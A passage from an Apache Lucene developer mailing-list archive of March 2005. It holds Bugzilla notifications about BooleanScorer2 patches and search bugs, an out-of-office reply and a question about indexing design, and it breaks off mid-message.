+0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2OFbbL9011285; Thu, 24 Mar 2005 16:37:37 +0100 Date: Thu, 24 Mar 2005 16:37:37 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34149] - Wierd behavior when searching plurals X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34149>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34149 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |INVALID ------- Additional Comments From [email protected] 2005-03-24 16:37 ------- Please disregard this entry. I found the problem. The analyzer being used was not the standard analyzer, but an extended version of the standard analyzer that included a stemming filter, which added some root word tokens. These tokens produced the wierd behavior. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 24 23:32:05 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22860 invoked from network); 24 Mar 2005 23:32:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2005 23:32:05 -0000 Received: (qmail 45816 invoked by uid 500); 24 Mar 2005 23:29:50 -0000 Delivered-To: [email protected] Received: (qmail 45675 invoked by uid 500); 24 Mar 2005 23:29:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45583 invoked by uid 500); 24 Mar 2005 23:29:48 -0000 Delivered-To: [email protected] Received: (qmail 45359 invoked by uid 99); 24 Mar 2005 23:29:47 -0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=DATE_IN_PAST_24_48,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 15:29:45 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 1D50C411 for <[email protected]>; Fri, 25 Mar 2005 00:29:03 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2NKLEum020333; Wed, 23 Mar 2005 21:21:14 +0100 Date: Wed, 23 Mar 2005 21:21:14 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34154] New: - Further improvements to BooleanScorer2 X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34154>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34154 Summary: Further improvements to BooleanScorer2 Product: Lucene Version: CVS Nightly - Specify date in submission Platform: Other OS/Version: other Status: NEW Severity: normal Priority: P2 Component: Search AssignedTo: [email protected] ReportedBy: [email protected] BugsThisDependsOn: 33019 -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 24 23:35:09 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25735 invoked from network); 24 Mar 2005 23:35:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2005 23:35:07 -0000 Received: (qmail 75607 invoked by uid 500); 24 Mar 2005 23:35:05 -0000 Delivered-To: [email protected] Received: (qmail 75579 invoked by uid 500); 24 Mar 2005 23:35:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75566 invoked by uid 99); 24 Mar 2005 23:35:05 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=BLANK_LINES_70_80,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from Unknown (HELO msw1.ccr.fr) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 15:35:03 -0800 Received: from domino-email1.ccr.fr (unverified [161.129.204.104]) by msw1.ccr.fr (Clearswift SMTPRS 5.0.9) with ESMTP id <[email protected]> for <[email protected]>; Fri, 25 Mar 2005 00:36:18 +0100 Subject: =?ISO-8859-1?Q?St=E9phane_LAGRAULET_est_absent=28e=29=2E?= From: [email protected] To: [email protected] Message-ID: <[email protected]> Date: Fri, 25 Mar 2005 00:36:15 +0100 X-MIMETrack: Serialize by Router on DOMINO-EMAIL1/CCRSMTP(Release 6.5.1|January 21, 2004) at 25/03/2005 00:36:24 MIME-Version: 1.0 Content-type: text/plain; charset=ISO-8859-1 Content-transfer-encoding: quoted-printable X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Je serai absent(e) du 25/03/2005 au 29/03/2005. Je r=E9pondrai =E0 votre message d=E8s mon retour.= --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 24 23:57:52 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32998 invoked from network); 24 Mar 2005 23:57:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2005 23:57:52 -0000 Received: (qmail 16229 invoked by uid 500); 24 Mar 2005 23:57:10 -0000 Delivered-To: [email protected] Received: (qmail 16042 invoked by uid 500); 24 Mar 2005 23:57:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15698 invoked by uid 500); 24 Mar 2005 23:57:07 -0000 Delivered-To: [email protected] Received: (qmail 15460 invoked by uid 99); 24 Mar 2005 23:57:05 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DATE_IN_PAST_24_48,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 15:57:04 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 23971445 for <[email protected]>; Fri, 25 Mar 2005 00:29:21 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2NKr67G026864; Wed, 23 Mar 2005 21:53:06 +0100 Date: Wed, 23 Mar 2005 21:53:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34154] - Further improvements to BooleanScorer2 X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34154>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34154 ------- Additional Comments From [email protected] 2005-03-23 21:53 ------- On the dependency on bug 33019: - The patch to BooleanQuery there is not needed when the BooleanQuery attached here is used. - The patch to BooleanScorer in bug 33019 is needed to make the attached BooleanQuery work. Finally, all tests pass here, including the TestBoolean2.java as patched in bug 33019. The recent patch that disables the coordination in generated queries and the test cases for such generated queries nicely exercise the attached BooleanScorer2 from which the coordination has been removed. Regards, Paul Elschot. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 24 23:57:52 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32973 invoked from network); 24 Mar 2005 23:57:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2005 23:57:52 -0000 Received: (qmail 16214 invoked by uid 500); 24 Mar 2005 23:57:10 -0000 Delivered-To: [email protected] Received: (qmail 15954 invoked by uid 500); 24 Mar 2005 23:57:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15771 invoked by uid 500); 24 Mar 2005 23:57:07 -0000 Delivered-To: [email protected] Received: (qmail 15551 invoked by uid 99); 24 Mar 2005 23:57:06 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DATE_IN_PAST_24_48,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 15:57:05 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 2B5EA461 for <[email protected]>; Fri, 25 Mar 2005 00:29:33 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2NKi9Nq024973; Wed, 23 Mar 2005 21:44:09 +0100 Date: Wed, 23 Mar 2005 21:44:09 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34154] - Further improvements to BooleanScorer2 X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34154>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34154 ------- Additional Comments From [email protected] 2005-03-23 21:44 ------- Created an attachment (id=14551) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14551&action=view) BooleanScorer2Coord.java This is a new class, split off from BooleanScorer2. It extends BooleanScorer2 with the coordination, ie. the match counting. Javadocs are included. There is one to do left in the code: /* To do: override makeSumScorer() * for special cases, eg. for a single ConjunctionScorer * and return these in getDelegatedScorer(). */ This to do is very similar to the special case of ConjunctionScorer in the current 1.4.3 BooleanScorer. When all clauses are required, this BooleanScorer2Coord (like the one in the trunk) delegates to a ConjunctionScorer that also counts the matches, which is somewhat superfluous. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 25 00:31:10 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44842 invoked from network); 25 Mar 2005 00:31:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Mar 2005 00:31:10 -0000 Received: (qmail 796 invoked by uid 500); 25 Mar 2005 00:30:40 -0000 Delivered-To: [email protected] Received: (qmail 596 invoked by uid 500); 25 Mar 2005 00:30:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 460 invoked by uid 500); 25 Mar 2005 00:30:38 -0000 Delivered-To: [email protected] Received: (qmail 431 invoked by uid 99); 25 Mar 2005 00:30:37 -0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=DATE_IN_PAST_24_48,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 16:30:36 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 2167F3E0 for <[email protected]>; Fri, 25 Mar 2005 00:28:42 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2NKLH6s020338; Wed, 23 Mar 2005 21:21:17 +0100 Date: Wed, 23 Mar 2005 21:21:17 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33019] - [PATCH] BooleanScorer can score documents in non increasing order X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33019>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33019 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- OtherBugsDependingO| |34154 nThis| | -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 25 00:31:14 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44898 invoked from network); 25 Mar 2005 00:31:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Mar 2005 00:31:14 -0000 Received: (qmail 1388 invoked by uid 500); 25 Mar 2005 00:30:45 -0000 Delivered-To: [email protected] Received: (qmail 1322 invoked by uid 500); 25 Mar 2005 00:30:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1270 invoked by uid 500); 25 Mar 2005 00:30:44 -0000 Delivered-To: [email protected] Received: (qmail 1250 invoked by uid 99); 25 Mar 2005 00:30:43 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DATE_IN_PAST_24_48,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 16:30:43 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 0ACF7433 for <[email protected]>; Fri, 25 Mar 2005 00:29:15 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2NKZlpc023268; Wed, 23 Mar 2005 21:35:47 +0100 Date: Wed, 23 Mar 2005 21:35:47 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34154] - Further improvements to BooleanScorer2 X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34154>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34154 ------- Additional Comments From [email protected] 2005-03-23 21:35 ------- Created an attachment (id=14550) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14550&action=view) BooleanScorer2.java Like the previous BooleanScorer2, but without the facilities for coordination, ie. no match counting. Added javadocs, and added a method to provide the scorer to which BooleanScorer2 delegates. BooleanQuery is adapted to use this delegated scorer to avoid an indirection. Added some protected methods to be used/overriden in BooleanScorer2Coord. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 25 00:32:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46578 invoked from network); 25 Mar 2005 00:32:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Mar 2005 00:32:48 -0000 Received: (qmail 5734 invoked by uid 500); 25 Mar 2005 00:31:21 -0000 Delivered-To: [email protected] Received: (qmail 5673 invoked by uid 500); 25 Mar 2005 00:31:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5404 invoked by uid 500); 25 Mar 2005 00:31:19 -0000 Delivered-To: [email protected] Received: (qmail 5319 invoked by uid 99); 25 Mar 2005 00:31:19 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DATE_IN_PAST_24_48,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 16:31:17 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id CBA6F46D for <[email protected]>; Fri, 25 Mar 2005 00:29:37 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2NDusna019323; Wed, 23 Mar 2005 14:56:54 +0100 Date: Wed, 23 Mar 2005 14:56:54 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34149] New: - Wierd behavior when searching plurals X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34149>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34149 Summary: Wierd behavior when searching plurals Product: Lucene Version: 1.4 Platform: PC OS/Version: Windows XP Status: NEW Severity: minor Priority: P4 Component: Search AssignedTo: [email protected] ReportedBy: [email protected] I have a simple collection containing 6 documents, each document has a field category. The values for this field are: Wine Wines Grape Grapes Cheese Cheeses If I search category for wines, I return one hit (wines). If I search for wine, I return 2 hits (wine, wines). I see the same behavior with grape and grapes. When I search for cheeses, I return one hit (cheeses). But when I search for cheese, I also return one hit (cheese). I expected 2 hits (cheese, cheeses). I can not explain this behavior. Is there an explanation for this behavior or is this a bug? I'm using the standard analyzer and query parser. I first saw this behavior in my application that implements Lucene. So, I used the Luke application to search my collection and found the same behavior. I used Luke to peek into my collection, but found what I expected, nothing unusual in the collection. Any insight greatly appreciated. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 25 03:00:24 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86260 invoked from network); 25 Mar 2005 03:00:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Mar 2005 03:00:24 -0000 Received: (qmail 60017 invoked by uid 500); 25 Mar 2005 03:00:17 -0000 Delivered-To: [email protected] Received: (qmail 59926 invoked by uid 500); 25 Mar 2005 03:00:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59834 invoked by uid 500); 25 Mar 2005 03:00:16 -0000 Delivered-To: [email protected] Received: (qmail 59794 invoked by uid 99); 25 Mar 2005 03:00:15 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 19:00:12 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 6A4393FB for <[email protected]>; Fri, 25 Mar 2005 00:29:20 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2OIYjaq015887; Thu, 24 Mar 2005 19:34:45 +0100 Date: Thu, 24 Mar 2005 19:34:45 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33725] - [PATCH] NullPointerException when using nested SpanOrQuery in SpanNotQuery X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33725>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33725 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Attachment #14357|0 |1 is obsolete| | ------- Additional Comments From [email protected] 2005-03-24 19:34 ------- Created an attachment (id=14558) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14558&action=view) Patch to TestBasics.java with the additional test cases except the discussed one. I think this settles the discussion, Regards, Paul Elschot -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 17:06:05 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59835 invoked from network); 26 Mar 2005 17:06:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 17:06:05 -0000 Received: (qmail 24622 invoked by uid 500); 26 Mar 2005 17:06:04 -0000 Delivered-To: [email protected] Received: (qmail 24161 invoked by uid 500); 26 Mar 2005 17:06:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24146 invoked by uid 99); 26 Mar 2005 17:06:01 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from smtp2.iitb.ac.in (HELO smtp1.iitb.ac.in) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Sat, 26 Mar 2005 09:06:01 -0800 Received: (qmail 30089 invoked from network); 26 Mar 2005 22:36:00 +0530 Received: from unknown (HELO ldns1.iitb.ac.in) (161.129.204.104) by smtp1.iitb.ac.in with SMTP; 26 Mar 2005 22:36:00 +0530 Received: (qmail 26110 invoked by uid 781); 26 Mar 2005 17:05:56 -0000 Received: from 161.129.204.104 by ldns1 (envelope-from <[email protected]>, uid 502) with qmail-scanner-1.23 (spamassassin: 2.54. Clear:RC:1(161.129.204.104):. Processed in 0.019178 secs); 26 Mar 2005 17:05:56 -0000 Received: from unknown (HELO cse.iitb.ac.in) (161.129.204.104) by ldns1.iitb.ac.in with SMTP; 26 Mar 2005 17:05:56 -0000 Received: (qmail 15733 invoked by uid 509); 26 Mar 2005 17:09:00 -0000 Received: from [email protected] by jeeves.cse.iitb.ac.in by uid 507 with qmail-scanner-1.22-st-qms (clamdscan: 0.73. spamassassin: 2.63. Clear:RC:1(161.129.204.104):. Processed in 0.625895 secs); 26 Mar 2005 17:09:00 -0000 X-Antivirus-cse.iitb.ac.in-Mail-From: [email protected] via jeeves.cse.iitb.ac.in X-Antivirus-cse.iitb.ac.in: 1.22-st-qms (Clear:RC:1(161.129.204.104):. Processed in 0.625895 secs Process 15728) Received: from mars.cse.iitb.ac.in (161.129.204.104) by cse.iitb.ac.in with SMTP; 26 Mar 2005 17:09:00 -0000 Date: Sat, 26 Mar 2005 22:35:56 +0530 (IST) From: Kriti R Puniyani <[email protected]> To: [email protected] Subject: Design Issues Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, Are there any papers/ documentation available on design issues in Indexing in Lucene? I am working on a similar indexing system, and am intersted in knowing about the design level decisions taken. Thanks -- Kriti Puniyani The idea is, you memorize these things, then write them down in little exam books, then forget them. If you fail to forget them, you become a professor and have to stay in college for the rest of your life. -(Dave Barry) --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 22:13:29 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3689 invoked from network); 26 Mar 2005 22:13:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 22:13:28 -0000 Received: (qmail 42706 invoked by uid 500); 26 Mar 2005 22:13:26 -0000 Delivered-To: [email protected] Received: (qmail 42668 invoked by uid 500); 26 Mar 2005 22:13:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42655 invoked by uid 500); 26 Mar 2005 22:13:24 -0000 Delivered-To: [email protected] Received: (qmail 42652 invoked by uid 99); 26 Mar 2005 22:13:24 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 26 Mar 2005 14:13:23 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id 26A5728A; Sat, 26 Mar 2005 23:13:19 +0100 (CET) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33019] - [PATCH] BooleanScorer can score documents in non increasing order X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sat, 26 Mar 2005 23:13:19 +0100 (CET) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33019>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33019 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Attachment #14105|0 |1 is obsolete| | ------- Additional Comments From [email protected] 2005-03-26 23:13 ------- Created an attachment (id=14569) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14569&action=view) BooleanScorer.java with more sorting done when skipTo is allowed While doing some 